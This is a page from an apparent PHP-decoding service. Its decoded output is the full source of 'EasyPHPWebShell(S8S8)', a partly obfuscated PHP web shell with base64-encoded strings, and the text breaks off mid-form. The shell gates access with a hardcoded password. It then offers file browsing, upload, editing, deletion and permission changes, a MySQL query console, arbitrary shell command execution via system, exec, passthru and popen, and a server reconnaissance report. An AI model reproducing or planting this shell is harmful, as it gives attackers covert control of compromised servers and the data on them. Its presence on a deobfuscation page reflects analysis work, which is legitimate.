Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>..
Decoded Output download
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>EasyPHPWebShell(S8S8)</title>
<style type="text/css">
<!--
body,td,th, h1, h2 {
font-size: 12px;
font-family: sans-serif;
}
body {background-color: #F8F8F8;}
.style1 {
font-size: 12px;
font-family: verdana, helvetica, sans-serif, ;
vertical-align: middle;
border: 1px solid #000000;
}
.stylebtext2 {color: #990000;font-weight: bold;}
.stylebtext3 {color: #FFFFFF;font-weight: bold;}
a:link,a:visited,a:active {color:#336699; text-decoration: underline;}
a:hover {COLOR: #990000;text-decoration: none;}
table {border-collapse: collapse;}
td, th { border: 1px solid #000000;}
-->
</style>
<?php @set_time_limit(0);@error_reporting(E_ERROR|E_WARNING|E_PARSE);@ob_start();$vpqta=microtime();if(get_magic_quotes_gpc()){$_GET=mwkb0($_GET);$_POST=mwkb0($_POST);}$lsyqb=0;$sndoc=base64_decode('NTA2NTMzOA==');$shced=24;?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>EasyPHPWebShell(S8S8)</title>
<style type="text/css">
<!--
body,td,th, h1, h2 {
font-size: 12px;
font-family: sans-serif;
}
body {background-color: #F8F8F8;}
.style1 {
font-size: 12px;
font-family: verdana, helvetica, sans-serif, ;
vertical-align: middle;
border: 1px solid #000000;
}
.stylebtext2 {color: #990000;font-weight: bold;}
.stylebtext3 {color: #FFFFFF;font-weight: bold;}
a:link,a:visited,a:active {color:#336699; text-decoration: underline;}
a:hover {COLOR: #990000;text-decoration: none;}
table {border-collapse: collapse;}
td, th { border: 1px solid #000000;}
-->
</style>
<? if($lsyqb==1){@session_start();if($_GET[base64_decode('YWN0aW9u')]==base64_decode('bG9nb3V0')){@hygoe(base64_decode('c215X3Bhc3N3b3Jk'));@session_destroy();@setcookie(base64_decode('Y215X3Bhc3N3b3Jk'),'');echo"<script>function redirect(){window.location.replace(\"{$_SERVER[base64_decode('UEhQX1NFTEY=')]}\");}redirect();</script>";}if($_GET[base64_decode('YWN0aW9u')]==base64_decode('bG9naW4=')){if($sndoc==$_POST[base64_decode('cG15X3Bhc3N3b3Jk')]){@avqof(base64_decode('c215X3Bhc3N3b3Jk'));$_SESSION[base64_decode('c215X3Bhc3N3b3Jk')]=$sndoc;@setcookie(base64_decode('Y215X3Bhc3N3b3Jk'),$sndoc,time()+(3600*$shced));echo"<script>function redirect(){window.location.replace(\"{$_SERVER[base64_decode('UEhQX1NFTEY=')]}\");}redirect();</script>";}}if(@vzob10(base64_decode('c215X3Bhc3N3b3Jk'))||isset($_COOKIE[base64_decode('Y215X3Bhc3N3b3Jk')])){if(($_SESSION[base64_decode('c215X3Bhc3N3b3Jk')]!=$sndoc)&&(!isset($_COOKIE[base64_decode('Y215X3Bhc3N3b3Jk')])||$_COOKIE[base64_decode('Y215X3Bhc3N3b3Jk')]!=$sndoc))deyv9();}else deyv9();}if(!@get_cfg_var(base64_decode('cmVnaXN0ZXJfZ2xvYmFscw=='))){foreach($_GET as $dgzl11=>$txfp12)$$dgzl11=$txfp12;foreach($_POST as $dgzl11=>$txfp12)$$dgzl11=$txfp12;foreach($_FILES as $dgzl11=>$txfp12)$$dgzl11=$txfp12;}if(isset($nouo13)){if(!file_exists($nouo13))$uoli14=base64_decode('5rKh5om+5Yiw5paH5Lu2');else{$lowq15=basename($nouo13);$ywwe16=fopen($nouo13,base64_decode('cmI='));if($ywwe16==false)$uoli14=base64_decode('5omT5byA5paH5Lu26ZSZ6K+v');else{Header(base64_decode('Q29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0='));Header(base64_decode('QWNjZXB0LVJhbmdlczogYnl0ZXM='));Header(base64_decode('QWNjZXB0LUxlbmd0aDog').filesize($nouo13));Header(base64_decode('Q29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9').$lowq15);echo fread($ywwe16,filesize($nouo13));fclose($ywwe16);exit;}}}if(isset($cimr17))if($cimr17!='')$hyph18=$cimr17;if(!isset($wrrc19)){$wrrc19=base64_decode('ZGly');$hyph18=base64_decode('Lg==');}if(!isset($hyph18))$hyph18=base64_decode('Lg==');$fkbz1a=str_replace(base64_decode('XFw='),base64_decode('Lw=='),$_SERVER[base64_decode('RE9DVU1FTlRfUk9PVA==')]);if(isset($tpob1b))$hyph18=hhoa6($hyph18);else if(isset($biay1c)){$hyph18=hhoa6($hyph18);if(strstr($hyph18,$fkbz1a))$hyph18=str_replace("$fkbz1a",base64_decode('Lg=='),$hyph18);else $hyph18=base64_decode('Lg==');}$srld1d=base64_decode('PGZvbnQgY29sb3I9Z3JlZW4+PGI+4pagPC9iPjwvZm9udD4=');$kpfb1e=base64_decode('PGZvbnQgY29sb3I9cmVkPjxiPuKWoDwvYj48L2ZvbnQ+');?>
<SCRIPT LANGUAGE="JavaScript">
function rusuredel(msg,url){
smsg = "()[" + msg + "]?";
if (confirm(smsg)){
url = url + msg;
window.location = url;
}
}
function rusurechk(msg,url){
smsg = "(,)[" + msg + "],(,):";
re = prompt(smsg,msg);
if (re){
url = url + re;
window.location = url;
}
}
</script>
</head>
<body>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="center" width="100%" bgcolor="#000000" class="stylebtext3">
EasyPHPWebShell 1.0(S8S8)
</td>
</tr>
<tr>
<td align="center" bgcolor="#EEEEEE">
:<? $uzyn1f=str_replace(base64_decode('XA=='),base64_decode('Lw=='),__FILE__);echo"<a href=\"$HTTP_SERVER_VARS[PHP_SELF]\">$uzyn1f</a>";?><a href="?action=logout"></a>
</td>
</tr>
<tr>
<td align="center" bgcolor="#EEEEEE"><a href="?action=dir&dir=."></a><a href="?action=editfile&dir=<?=urlencode($hyph18);?>&editfile=<?=urlencode($hyph18);?>/"></a><a href="?action=sql"></a><a href="?action=shell">Shell</a><a href="?action=env"></a><a href="?action=phpinfo">PHP</a><a href="http://www.s8s8.net/forums/index.php?showtopic=15998"></a>
</td>
</tr>
</table>
<br>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" bgcolor="#000000" align="center" class="stylebtext3">
<? if($wrrc19==base64_decode('ZGly')){?>
</td>
</tr>
<tr>
<form method="post" action="?action=dir&dir=<?=urlencode($hyph18);?>" enctype="multipart/form-data">
<td bgcolor="#EEEEEE"> :
<input name="gotodir" type="text" class="style1" value="<?=$hyph18?>" size="60">
<input name="gotodirb" type="submit" class="style1" value=""><? if($hyph18[1]==base64_decode('Og=='))echo base64_decode('44CQPGEgaHJlZj0iP2FjdGlvbj1kaXImZGlyPQ==').urlencode($hyph18).base64_decode('JnVuYWJzcGF0aD0xIj7ngrnmraTnlKg8Yj7nm7jlr7k8L2I+6Lev5b6E5p+l55yLPC9hPuOAkSZuYnNwOw==');else echo base64_decode('44CQPGEgaHJlZj0iP2FjdGlvbj1kaXImZGlyPQ==').urlencode($hyph18).base64_decode('JmFic3BhdGg9MSI+54K55q2k55SoPGI+57ud5a+5PC9iPui3r+W+hOafpeecizwvYT7jgJEmbmJzcDs=');?>
</td>
</form>
</tr>
<tr>
<form method="post" action="?action=fileup&dir=<?=urlencode($hyph18);?>" enctype="multipart/form-data">
<td bgcolor="#EEEEEE"> ():
<input name="filedir" type="text" class="style1" value="<?=$hyph18?>" size="30"> :
<input name="userfile" type="file" class="style1" size="30">
<input name="userfileb" type="submit" class="style1" value="">
</td>
</form>
</tr>
<tr>
<form method="post" action="?action=filecreate&dir=<?=urlencode($hyph18);?>" enctype="multipart/form-data">
<td bgcolor="#EEEEEE"> ():
<input name="mkname" type="text" value="" size=30 class="style1">
<input name="mkfileb" type="submit" value="" class="style1">
<input name="mkdirb" type="submit" value="" class="style1"> :<b><? $xxxn20=base64_decode('5LiN5Y+v5YaZ');if(is_dir($hyph18)){if($mhmo21=@fopen("$hyph18/temp.tmp",base64_decode('dw=='))){@fclose($mhmo21);@unlink("$hyph18/temp.tmp");$xxxn20=base64_decode('5Y+v5YaZ');}}echo"$xxxn20</b>";?>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr bgcolor="#000000" class="stylebtext3">
<td width="25%"></td>
<td width="40%">|</td>
<td width="10%">(KB)</td>
<td width="8%"></td>
<td width="17%"></td>
</tr>
<?php $sawf22=0;$mhrk23=0;$rweh24=base64_decode('I0VFRUVFRQ==');$vpsv25=@opendir($hyph18);while($dewj26=@readdir($vpsv25)){if(@is_dir("$hyph18/$dewj26")){$ehjb27=base64_decode('LQ==');$nlmd28=base64_decode('LQ==');$nxms29=base64_decode('LQ==');$epeo2a=base64_decode('LQ==');$shrj2b=base64_decode('LQ==');if($dewj26==base64_decode('Li4=')){if($hyph18==base64_decode('Lg=='))continue;$goqg2c=@dirname($hyph18);if($hyph18[1]==base64_decode('Og==')){$goqg2c=hhoa6($goqg2c);if(strlen($goqg2c)<=3)$goqg2c=substr($goqg2c,0,2);}$erza2d=base64_decode('4pazIA==');$dewj26=base64_decode('5LiK57qn55uu5b2V');}else if($dewj26==base64_decode('Lg==')){if($hyph18==base64_decode('Lg=='))continue;$hyph18[1]==base64_decode('Og==')?$goqg2c=substr(hhoa6($goqg2c),0,2):$goqg2c=$dewj26;$erza2d=base64_decode('4peLIA==');$dewj26=base64_decode('5qC557qn55uu5b2V');}else{$ehjb27=base64_decode('W0RJUl0=');$goqg2c="$hyph18/$dewj26";$nlmd28=@date(base64_decode('WS1uLWQgSDppOnM='),@filectime("$goqg2c"));$nxms29=@date(base64_decode('WS1uLWQgSDppOnM='),@filemtime("$goqg2c"));$shrj2b=substr(@base_convert(@fileperms($goqg2c),10,8),-4);$erza2d=base64_decode('4pahIA==');$vqxf2e="[$dewj26]";$epeo2a="[<a href=\"\" title=\"\" onClick=\"rusuredel('$goqg2c','?action=filedel&dir=$hyph18&deldir=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$goqg2c','?action=filerename&dir=$hyph18&renamef=$goqg2c&renamet=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$goqg2c','?action=filecopy&dir=$hyph18©dirf=$goqg2c©dirt=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$shrj2b','?action=filetype&dir=$hyph18&ctype=');return false;\"></a>]";$mhrk23++;}$rweh24=nbcj8($rweh24);echo"<tr bgcolor=\"$rweh24\">"."<td width=\"25%\">$erza2d [<a href=\"?action=dir&dir=$goqg2c\" title = \"\">$dewj26</a>]</td>"."<td width=\"40%\">[$nlmd28|$nxms29]</td>"."<td width=\"10%\">$ehjb27</td>"."<td width=\"8%\">$shrj2b</td>"."<td width=\"17%\">$epeo2a</td>".base64_decode('PC90cj4=');}}@closedir($vpsv25);$vpsv25=@opendir($hyph18);while($dewj26=@readdir($vpsv25)){if(!@is_dir("$hyph18/$dewj26")&&$dewj26!=base64_decode('Li4=')){$shrj2b=substr(@base_convert(@fileperms("$hyph18/$dewj26"),10,8),-4);$epeo2a="[<a href=\"\" title=\"\" onClick=\"rusuredel('$hyph18/$dewj26','?action=filedel&dir=$hyph18&delfile=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$hyph18/$dewj26','?action=filerename&dir=$hyph18&renamef=$hyph18/$dewj26&renamet=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$hyph18/$dewj26','?action=filecopy&dir=$hyph18©filef=$hyph18/$dewj26©filet=');return false;\"></a>|"."<a href=\"\" title=\"\" onClick=\"rusurechk('$shrj2b','?action=filetype&dir=$hyph18&cfile=$hyph18/$dewj26&ctype=');return false;\"></a>|"."<a href=\"?action=dir&df_path=$hyph18/$dewj26\" title=\"\"></a>|"."<a href=\"?action=editfile&dir=$hyph18&editfile=$hyph18/$dewj26\" title=\"\"></a>]";$rweh24=nbcj8($rweh24);echo"<tr bgcolor=\"$rweh24\">"."<td width=\"25%\"> <a href=\"$hyph18/$dewj26\" title = \"\" target=\"_blank\">$dewj26</a></td>".base64_decode('PHRkIHdpZHRoPSI0MCUiPls=').@date(base64_decode('WS1uLWQgSDppOnM='),@filectime("$hyph18/$dewj26")).base64_decode('fA==').@date(base64_decode('WS1uLWQgSDppOnM='),@filemtime("$hyph18/$dewj26")).base64_decode('XTwvdGQ+').base64_decode('PHRkIHdpZHRoPSIxMCUiPg==').@number_format(@filesize("$hyph18/$dewj26")/1024,3).base64_decode('PC90ZD4=').base64_decode('PHRkIHdpZHRoPSI4JSI+').$shrj2b.base64_decode('PC90ZD4=')."<td width=\"17%\">$epeo2a</td>".base64_decode('PC90cj4=');$sawf22++;}}@closedir($vpsv25);?>
<tr bgcolor="#000000" class="stylebtext3" align="center">
<td width="25%" colspan="5">:<?=$mhrk23?>,:<?=$sawf22?></td>
</tr>
</table>
<? }else if($wrrc19==base64_decode('ZWRpdGZpbGU=')){?>
()
</td>
</tr>
<tr>
<form method="post" action="?action=filesave&dir=<?=urlencode($hyph18);?>" enctype="multipart/form-data">
<td align="center" valign="top" bgcolor="#EEEEEE">:
<input name="editfilename" type="text" class="style1" value="<?=$plvq2f?>" size="30">
<input name="editbackfile" type="checkbox" value="1" class="style1">(.bak)<br>
<textarea name="editfiletext" cols="120" rows="25" class="style1"><? $jguu30=@fopen($plvq2f,base64_decode('cmI='));$jguu30==false?$luwp31=base64_decode('6K+75Y+W5paH5Lu26ZSZ6K+vKOaIluWwmuacquivu+WPluaWh+S7tiku'):$luwp31=@fread($jguu30,filesize($plvq2f));@fclose($jguu30);$luwp31=htmlspecialchars($luwp31);echo"$luwp31";?></textarea><p>
<input name="editfileb" type="submit" value="" class="style1">
<input name="editagainb" type="reset" value="" class="style1">
<a href="?action=dir&dir=<?=urlencode($hyph18);?>"></a>
<p>
</td>
</form>
</tr>
</table>
<? }else if(base64_decode('c3Fs')==substr($wrrc19,0,3)){?>
</td>
</tr>
<tr>
<form method="post" action="?action=sql" enctype="multipart/form-data">
<td align="center" valign="top" bgcolor="#EEEEEE">
:<input name="sqlhost" type="text" class="style1" value="<?=isset($lita32)?$lita32:base64_decode('bG9jYWxob3N0')?>" size="20">
:<input name="sqlport" type="text" class="style1" value="<?=isset($crgb33)?$crgb33:base64_decode('MzMwNg==')?>" size="5">
:<input name="sqluser" type="text" class="style1" value="<?=isset($qaok34)?$qaok34:base64_decode('cm9vdA==')?>" size="10">
:<input name="sqlpasd" type="text" class="style1" value="<?=isset($yqev35)?$yqev35:''?>" size="10">
:<input name="sqldb" type="text" class="style1" value="<?=isset($zggo36)?$zggo36:''?>" size="10"><br>
<textarea name="sqlcmdtext" cols="120" rows="10" class="style1"><? if(!empty($jkqr37)){@hwil38("{$lita32}:{$crgb33}","$qaok34","$yqev35")or die(base64_decode('5pWw5o2u5bqT6L+e5o6l5aSx6LSl'));@zflf39("$zggo36")or die(base64_decode('6YCJ5oup5pWw5o2u5bqT5aSx6LSl'));$gfxy3a=@hssg3b("$jkqr37");echo $jkqr37;ixdj3c();}?></textarea><p>
<span class="stylebtext2"><? echoisset($wasr3d)?($gfxy3a?base64_decode('5omn6KGM5oiQ5YqfLg=='):base64_decode('5omn6KGM5aSx6LSlOg==').tphi3e()):'';?></span><p>
<input name="sqlcmdb" type="submit" value="" class="style1">
<input name="sqlagainb" type="reset" value="" class="style1">
<p>
</td>
</form>
</tr>
</table>
<? }else if(base64_decode('c2hlbGw=')==substr($wrrc19,0,5)){?>
Shell
</td>
</tr>
<tr>
<form method="post" action="?action=shell" enctype="multipart/form-data">
<td align="center" valign="top" bgcolor="#EEEEEE">
:<select name="seletefunc" class="input">
<option value="system" <?=($hlds3f==base64_decode('c3lzdGVt'))?base64_decode('c2VsZWN0ZWQ='):'';?>>system</option>
<option value="exec" <?=($hlds3f==base64_decode('ZXhlYw=='))?base64_decode('c2VsZWN0ZWQ='):'';?>>exec</option>
<option value="shell_exec" <?=($hlds3f==base64_decode('c2hlbGxfZXhlYw=='))?base64_decode('c2VsZWN0ZWQ='):'';?>>shell_exec</option>
<option value="passthru" <?=($hlds3f==base64_decode('cGFzc3RocnU='))?base64_decode('c2VsZWN0ZWQ='):'';?>>passthru</option>
<option value="popen" <?=($hlds3f==base64_decode('cG9wZW4='))?base64_decode('c2VsZWN0ZWQ='):'';?>>popen</option>
</select>
:<input name="shellcmd" type="text" class="style1" value="<?=isset($tchz40)?$tchz40:''?>" size="80">
<textarea name="shelltext" cols="120" rows="10" class="style1"><? if(!empty($tchz40)){if($hlds3f==base64_decode('cG9wZW4=')){$bfgx41=popen($tchz40,base64_decode('cg=='));echo fread($bfgx41,2096);pclose($bfgx41);}else{echo $ofoy42=(base64_decode('c3lzdGVt')==$hlds3f)?system($tchz40):(($hlds3f==base64_decode('ZXhlYw=='))?exec($tchz40):(($hlds3f==base64_decode('c2hlbGxfZXhlYw=='))?shell_exec($tchz40):(($hlds3f==base64_decode('cGFzc3RocnU='))?passthru($tchz40):system($tchz40))));}}?></textarea><p>
<span class="stylebtext2"><? echo get_cfg_var(base64_decode('c2FmZV9tb2Rl'))?base64_decode('5o+Q56S6OuWuieWFqOaooeW8j+S4i+WPr+iDveaXoOazleaJp+ihjA=='):'';?></span><p>
<input name="shellcmdb" type="submit" value="" class="style1">
<input name="shellagainb" type="reset" value="" class="style1">
<p>
</td>
</form>
</tr>
</table>
<? }else if($wrrc19==base64_decode('cGhwaW5mbw==')){?>
PHP
</td>
</tr>
<tr>
<td align="center" bgcolor="#EEEEEE" class="stylebtext2"><br><? phpinfo();if(wimq43(base64_decode('cGhwaW5mbw=='),get_cfg_var(base64_decode('ZGlzYWJsZV9mdW5jdGlvbnM='))))echo base64_decode('PGI+cGhwaW5mb+WHveaVsOiiq+emgeatojwvYj48YnI+');?><br>
</td>
</tr>
</table>
<? }else if(base64_decode('ZmlsZQ==')==substr($wrrc19,0,4)){?>
</td>
</tr>
<tr>
<td align="center" bgcolor="#EEEEEE" class="stylebtext2">
<br>
<? if($wrrc19==base64_decode('ZmlsZXNhdmU=')){if(isset($snhd44)&&isset($gbvf45)){if(isset($dfov46)&&($dfov46==1))echo $ofoy42=@copy($gbvf45,$gbvf45.base64_decode('LmJhaw=='))?base64_decode('55Sf5oiQ5aSH5Lu95paH5Lu25oiQ5YqfLjxwPg=='):base64_decode('55Sf5oiQ5aSH5Lu95paH5Lu25oiQ5YqfPHA+');$jguu30=@fopen($gbvf45,base64_decode('dw=='));if($jguu30==false)echo"[$gbvf45].";else{echo $ofoy42=@fwrite($jguu30,$cnfz47)?"[$gbvf45]!":"[$gbvf45]";@fclose($jguu30);}}}else if($wrrc19==base64_decode('ZmlsZWRlbA==')){if(isset($hdgt48)){echo $ofoy42=file_exists($hdgt48)?(seko1($hdgt48)?"[$hdgt48]!":"[$hdgt48]!"):"[$hdgt48]!!";}else if(isset($hrzt49)){@chmod("$hrzt49",0777);echo $ofoy42=file_exists($hrzt49)?(@unlink($hrzt49)?"[$hrzt49]!":"[$hrzt49]!"):"[$hrzt49]!";}}else if($wrrc19==base64_decode('ZmlsZXJlbmFtZQ==')){echo $ofoy42=file_exists($gobq4a)?(@rename($gobq4a,$phxk4b)?"[$gobq4a][{$phxk4b}]":"[$gobq4a][{$phxk4b}]"):"[$gobq4a]!";}else if($wrrc19==base64_decode('ZmlsZWNvcHk=')){if(isset($qtro4c)&&isset($wbed4d)){echo $ofoy42=file_exists($qtro4c)?(wstv3($wbed4d)?(lzcl2($qtro4c,$wbed4d)?"[$qtro4c][$wbed4d]":"[$qtro4c][$wbed4d]"):"[$wbed4d]"):"[$qtro4c]!";}else if(isset($lscz4e)&&isset($nfoc4f)){echo $ofoy42=file_exists($lscz4e)?(wstv3(dirname($nfoc4f))?(@copy($lscz4e,$nfoc4f)?"[$lscz4e][$nfoc4f]":"[$lscz4e][$nfoc4f]"):base64_decode('55uu5qCH55uu5b2V5LiN5a2Y5Zyo5LiU5Yib5bu66ZSZ6K+v')):"[$lscz4e]!";}}else if($wrrc19==base64_decode('ZmlsZWNyZWF0ZQ==')){if(isset($qziw50)){echo $ofoy42=file_exists("$hyph18/$totk51")?"[{$hyph18}/{$totk51}]":(@mkdir("$hyph18/$totk51",0777)?"[$totk51]":"[$totk51]");}else if(isset($qind52)){if(file_exists("$hyph18/$totk51"))echo"[$hyph18/$totk51]";else{$jguu30=@fopen("$hyph18/$totk51",base64_decode('dw=='));if($jguu30==false)echo"[$totk51].";else{echo"[$totk51] <a href=\"?action=editfile&dir=".urlencode($hyph18).base64_decode('JmVkaXRmaWxlPQ==').urlencode($hyph18).base64_decode('Lw==').urlencode($totk51).base64_decode('Ij48cD7ngrnmraTot7PovazlhaXnvJbovpHmtY/op4jpobXpnaI8L2E+');@fclose($jguu30);}}}}else if($wrrc19==base64_decode('ZmlsZXR5cGU=')){echo $ofoy42=@chmod($suyl53,base_convert($bgwh54,8,10))?base64_decode('5pu05pS55oiQ5YqfIQ=='):base64_decode('5pu05pS55aSx6LSlIQ==');}else if($wrrc19==base64_decode('ZmlsZXVw')){echo $ofoy42=@copy($lpfz55[base64_decode('dG1wX25hbWU=')],"{$tzqg56}/{$lpfz55[base64_decode('bmFtZQ==')]}")?"[{$lpfz55[base64_decode('bmFtZQ==')]}].:[{$tzqg56}/{$lpfz55[base64_decode('bmFtZQ==')]}]({$lpfz55[base64_decode('c2l6ZQ==')]}).":"[{$lpfz55[base64_decode('bmFtZQ==')]}]";}else{echo base64_decode('6ZSZ6K+v55qE5o+Q5Lqk5Y+C5pWwYWN0aW9uLg==');}?>
<p>
<a href="?action=dir&dir=<?=urlencode($hyph18);?>"></a>
<p>
</td>
</tr>
</table>
<? }else if($wrrc19==base64_decode('ZW52')){?>
<?=$srld1d?> <?=$kpfb1e?><br>
</td>
</tr>
<? $lgxq57[0]=array(base64_decode('5Li75py65Z+f5ZCNOg=='),$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]);$lgxq57[1]=array(base64_decode('5Li75py6SVA6'),gethostbyname($_SERVER[base64_decode('U0VSVkVSX05BTUU=')]));$lgxq57[2]=array(base64_decode('5Li75py656uv5Y+jOg=='),$_SERVER[base64_decode('U0VSVkVSX1BPUlQ=')]);$lgxq57[3]=array(base64_decode('5Li75py65pe26Ze0Og=='),date(base64_decode('WS9tL2RfaDppOnM='),time()));$lgxq57[4]=array(base64_decode('5Li75py657O757ufOg=='),PHP_OS);$lgxq57[5]=array(base64_decode('5Li75py6V0VC5pyN5Yqh5Zmo'),$_SERVER[base64_decode('U0VSVkVSX1NPRlRXQVJF')]);$lgxq57[6]=array(base64_decode('UEhQ54mI5pysOg=='),PHP_VERSION);$lgxq57[7]=array(base64_decode('5Ymp5L2Z56m66Ze0Og=='),intval(diskfreespace(base64_decode('Lg=='))/(1024*1024).base64_decode('TUI=')));$lgxq57[8]=array(base64_decode('5Li75py66K+t6KiA'),$_SERVER[base64_decode('SFRUUF9BQ0NFUFRfTEFOR1VBR0U=')]);$lgxq57[9]=array(base64_decode('5b2T5YmN55So5oi3'),get_current_user());$lgxq57[10]=array(base64_decode('5pyA5aSn5YaF5a2Y5Y2g55SoOg=='),wush7(base64_decode('bWVtb3J5X2xpbWl0'),1));$lgxq57[11]=array(base64_decode('5pyA5aSn5Y2V5Liq5LiK5Lyg5paH5Lu2'),wush7(base64_decode('dXBsb2FkX21heF9maWxlc2l6ZQ=='),1));$lgxq57[12]=array(base64_decode('UE9TVOacgOWkp+WuuemHjw=='),wush7(base64_decode('cG9zdF9tYXhfc2l6ZQ=='),1));$lgxq57[13]=array(base64_decode('6ISa5pys6LaF5pe2'),wush7(base64_decode('bWF4X2V4ZWN1dGlvbl90aW1l'),1));$lgxq57[14]=array(base64_decode('5bGP6JS955qE5Ye95pWw'),wush7(base64_decode('ZGlzYWJsZV9mdW5jdGlvbnM='),1));$wyyf58[0]=array(base64_decode('TVlTUUw='),wush7(base64_decode('bXlzcWxfY2xvc2U='),2));$wyyf58[1]=array(base64_decode('T3JhY2xl'),wush7(base64_decode('b3JhX2Nsb3Nl'),2));$wyyf58[2]=array(base64_decode('T3JhY2xlIDg='),wush7(base64_decode('T0NJTG9nT2Zm'),2));$wyyf58[3]=array(base64_decode('T0JEQw=='),wush7(base64_decode('b2RiY19jbG9zZQ=='),2));$wyyf58[4]=array(base64_decode('U3lCYXNl'),wush7(base64_decode('c3liYXNlX2Nsb3Nl'),2));$wyyf58[5]=array(base64_decode('U1FMX1NlcnZlcg=='),wush7(base64_decode('bXNzcWxfY2xvc2U='),2));$wyyf58[6]=array(base64_decode('REJhc2U='),wush7(base64_decode('ZGJhc2VfY2xvc2U='),2));$wyyf58[7]=array(base64_decode('SHlwZXJ3YXZl'),wush7(base64_decode('aHdfY2xvc2U='),2));$wyyf58[8]=array(base64_decode('UG9zdGdyZV9TUUw='),wush7(base64_decode('cGdfY2xvc2U='),2));$vcth59[0]=array(base64_decode('U2Vzc2lvbuaUr+aMgQ=='),wush7(base64_decode('c2Vzc2lvbl9zdGFydA=='),2));$vcth59[1]=array(base64_decode('U29ja2V05pSv5oyB'),wush7(base64_decode('ZnNvY2tvcGVu'),2));$vcth59[2]=array(base64_decode('5Y6L57yp5paH5Lu25pSv5oyBKFpsaWIp'),wush7(base64_decode('Z3pjbG9zZQ=='),2));$vcth59[3]=array(base64_decode('U01UUOaUr+aMgQ=='),wush7(base64_decode('c210cA=='),2));$vcth59[4]=array(base64_decode('WE1M5pSv5oyB'),wush7(base64_decode('WE1MIFN1cHBvcnQ='),3));$vcth59[5]=array(base64_decode('RlRQ5pSv5oyB'),wush7(base64_decode('RlRQIHN1cHBvcnQ='),3));$vcth59[6]=array(base64_decode('U2VuZG1haWzmlK/mjIE='),wush7(base64_decode('SW50ZXJuYWwgU2VuZG1haWwgU3VwcG9ydCBmb3IgV2luZG93cyA0'),3));$vcth59[7]=array(base64_decode('U05NUOaUr+aMgQ=='),wush7(base64_decode('c25tcGdldA=='),2));$vcth59[8]=array(base64_decode('UERG5paH5qGj5pSv5oyB'),wush7(base64_decode('cGRmX2Nsb3Nl'),2));$vcth59[9]=array(base64_decode('SU1BUOeUteWtkOmCruS7tuaUr+aMgQ=='),wush7(base64_decode('aW1hcF9jbG9zZQ=='),2));$vcth59[10]=array(base64_decode('5Zu+5b2i5aSE55CGR0QgTGlicmFyeeaUr+aMgQ=='),wush7(base64_decode('aW1hZ2VsaW5l'),2));$vcth59[11]=array(base64_decode('WkVOROaUr+aMgQ=='),wush7(base64_decode('emVuZF92ZXJzaW9u'),2).base64_decode('KA==').zend_version().base64_decode('KQ=='));$vcth59[12]=array(base64_decode('5YWB6K645L2/55SoVVJM5omT5byA5paH5Lu2'),wush7(base64_decode('YWxsb3dfdXJsX2ZvcGVu'),2));$vcth59[13]=array(base64_decode('UFJFTOebuOWuueivreazlSBQQ1JF'),wush7(base64_decode('cHJlZ19tYXRjaA=='),2));$vcth59[14]=array(base64_decode('5pi+56S66ZSZ6K+v5L+h5oGv'),wush7(base64_decode('ZGlzcGxheV9lcnJvcnM='),2));$vcth59[15]=array(base64_decode('6Ieq5Yqo5a6a5LmJ5YWo5bGA5Y+Y6YeP'),wush7(base64_decode('cmVnaXN0ZXJfZ2xvYmFscw=='),2));$vcth59[16]=array(base64_decode('UEhQ6L+Q6KGM5pa55byP'),strtoupper(php_sapi_name()));?>
<tr>
<td align="center" bgcolor="#EEEEEE">
<table width="600" border="0" cellpadding="0" cellspacing="0"><br>
<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2"></td></tr>
<? for($msvh5a=0;$msvh5a<15;$msvh5a++){$rweh24=nbcj8($rweh24);echo"<tr bgcolor=\"$rweh24\"><td>{$lgxq57[$msvh5a][0]}</td><td>{$lgxq57[$msvh5a][1]}</td></tr>";}?>
<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2"></td></tr>
<? for($msvh5a=0;$msvh5a<9;$msvh5a++){$rweh24=nbcj8($rweh24);echo"<tr bgcolor=\"$rweh24\"><td>{$wyyf58[$msvh5a][0]}</td><td>{$wyyf58[$msvh5a][1]}</td></tr>";}?>
<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2"></td></tr>
<? for($msvh5a=0;$msvh5a<17;$msvh5a++){$rweh24=nbcj8($rweh24);echo"<tr bgcolor=\"$rweh24\"><td>{$vcth59[$msvh5a][0]}</td><td>{$vcth59[$msvh5a][1]}</td></tr>";}?>
<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">PHP(",")</td></tr>
<tr bgcolor="#EEEEEE">
<form method="post" action="?action=env" enctype="multipart/form-data">
<td colspan="2">ProgIdClassId:
<input name="envname" type="text" size="50" class="style1" value=<?=isset($psta5b)?$psta5b:'';?>>
<input name="envnameb" type="submit" value="" class="style1">
</td>
</form>
</tr>
